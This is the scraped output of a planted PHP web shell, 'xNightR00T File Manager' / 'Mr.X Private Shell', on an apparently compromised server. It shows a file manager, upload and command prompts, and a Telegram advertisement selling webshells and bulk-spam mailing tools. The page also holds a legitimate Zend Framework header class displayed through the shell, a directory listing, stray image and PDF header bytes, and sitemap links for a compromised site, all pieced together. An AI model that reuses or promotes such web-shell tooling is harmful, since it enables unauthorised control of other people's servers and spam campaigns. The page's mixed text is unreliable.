xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
/**
 * @see       https://github.com/zendframework/zend-http for the canonical source repository
 * @copyright Copyright (c) 2005-2017 Zend Technologies USA Inc. (http://www.zend.com)
 * @license   https://github.com/zendframework/zend-http/blob/master/LICENSE.md New BSD License
 */

namespace Zend\Http\Header;

use Zend\Uri\Exception as UriException;
use Zend\Uri\UriFactory;
use Zend\Uri\UriInterface;

/**
 * Abstract Location Header
 * Supports headers that have URI as value
 * @see Zend\Http\Header\Location
 * @see Zend\Http\Header\ContentLocation
 * @see Zend\Http\Header\Referer
 *
 * Note for 'Location' header:
 * While RFC 1945 requires an absolute URI, most of the browsers also support relative URI
 * This class allows relative URIs, and let user retrieve URI instance if strict validation needed
 */
abstract class AbstractLocation implements HeaderInterface
{
    /**
     * URI for this header
     *
     * @var UriInterface
     */
    protected $uri;

    /**
     * Create location-based header from string
     *
     * @param string $headerLine
     * @return AbstractLocation
     * @throws Exception\InvalidArgumentException
     */
    public static function fromString($headerLine)
    {
        $locationHeader = new static();

        // ZF-5520 - IIS bug, no space after colon
        list($name, $uri) = GenericHeader::splitHeaderLine($headerLine);

        // check to ensure proper header type for this factory
        if (strtolower($name) !== strtolower($locationHeader->getFieldName())) {
            throw new Exception\InvalidArgumentException(
                'Invalid header line for "' . $locationHeader->getFieldName() . '" header string'
            );
        }

        HeaderValue::assertValid($uri);
        $locationHeader->setUri(trim($uri));

        return $locationHeader;
    }

    /**
     * Set the URI/URL for this header, this can be a string or an instance of Zend\Uri\Http
     *
     * @param string|UriInterface $uri
     * @return AbstractLocation
     * @throws Exception\InvalidArgumentException
     */
    public function setUri($uri)
    {
        if (is_string($uri)) {
            try {
                $uri = UriFactory::factory($uri);
            } catch (UriException\InvalidUriPartException $e) {
                throw new Exception\InvalidArgumentException(
                    sprintf('Invalid URI passed as string (%s)', (string) $uri),
                    $e->getCode(),
                    $e
                );
            }
        } elseif (! ($uri instanceof UriInterface)) {
            throw new Exception\InvalidArgumentException('URI must be an instance of Zend\Uri\Http or a string');
        }
        $this->uri = $uri;

        return $this;
    }

    /**
     * Return the URI for this header
     *
     * @return string
     */
    public function getUri()
    {
        if ($this->uri instanceof UriInterface) {
            return $this->uri->toString();
        }
        return $this->uri;
    }

    /**
     * Return the URI for this header as an instance of Zend\Uri\Http
     *
     * @return UriInterface
     */
    public function uri()
    {
        if ($this->uri === null || is_string($this->uri)) {
            $this->uri = UriFactory::factory($this->uri);
        }
        return $this->uri;
    }

    /**
     * Get header value as URI string
     *
     * @return string
     */
    public function getFieldValue()
    {
        return $this->getUri();
    }

    /**
     * Output header line
     *
     * @return string
     */
    public function toString()
    {
        return $this->getFieldName() . ': ' . $this->getUri();
    }

    /**
     * Allow casting to string
     *
     * @return string
     */
    public function __toString()
    {
        return $this->toString();
    }
}

Filemanager

Name Type Size Permission Actions
Accept Folder 0755
Exception Folder 0755
AbstractAccept.php File 13.9 KB 0644
AbstractDate.php File 7.04 KB 0644
AbstractLocation.php File 3.73 KB 0644
Accept.php File 3.05 KB 0644
AcceptCharset.php File 1.81 KB 0644
AcceptEncoding.php File 1.83 KB 0644
AcceptLanguage.php File 2.83 KB 0644
AcceptRanges.php File 1.6 KB 0644
Age.php File 2.44 KB 0644
Allow.php File 4.51 KB 0644
AuthenticationInfo.php File 1.5 KB 0644
Authorization.php File 1.5 KB 0644
CacheControl.php File 6.39 KB 0644
Connection.php File 2.6 KB 0644
ContentDisposition.php File 1.53 KB 0644
ContentEncoding.php File 1.49 KB 0644
ContentLanguage.php File 1.51 KB 0644
ContentLength.php File 1.51 KB 0644
ContentLocation.php File 641 B 0644
ContentMD5.php File 1.44 KB 0644
ContentRange.php File 1.5 KB 0644
ContentSecurityPolicy.php File 4.21 KB 0644
ContentTransferEncoding.php File 1.58 KB 0644
ContentType.php File 9.94 KB 0644
Cookie.php File 3.6 KB 0644
Date.php File 599 B 0644
Etag.php File 1.4 KB 0644
Expect.php File 1.41 KB 0644
Expires.php File 821 B 0644
From.php File 1.4 KB 0644
GenericHeader.php File 4.08 KB 0644
GenericMultiHeader.php File 1.45 KB 0644
HeaderInterface.php File 1.08 KB 0644
HeaderValue.php File 2.81 KB 0644
Host.php File 1.4 KB 0644
IfMatch.php File 1.42 KB 0644
IfModifiedSince.php File 636 B 0644
IfNoneMatch.php File 1.49 KB 0644
IfRange.php File 1.42 KB 0644
IfUnmodifiedSince.php File 642 B 0644
KeepAlive.php File 1.4 KB 0644
LastModified.php File 625 B 0644
Location.php File 618 B 0644
MaxForwards.php File 1.49 KB 0644
MultipleHeaderInterface.php File 443 B 0644
Origin.php File 1.61 KB 0644
Pragma.php File 1.41 KB 0644
ProxyAuthenticate.php File 2.06 KB 0644
ProxyAuthorization.php File 1.52 KB 0644
Range.php File 1.41 KB 0644
Referer.php File 974 B 0644
Refresh.php File 1.37 KB 0644
RetryAfter.php File 2.35 KB 0644
Server.php File 1.41 KB 0644
SetCookie.php File 16.49 KB 0644
TE.php File 1.39 KB 0644
Trailer.php File 1.42 KB 0644
TransferEncoding.php File 1.49 KB 0644
Upgrade.php File 1.42 KB 0644
UserAgent.php File 1.46 KB 0644
Vary.php File 1.4 KB 0644
Via.php File 1.4 KB 0644
WWWAuthenticate.php File 2.05 KB 0644
Warning.php File 1.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml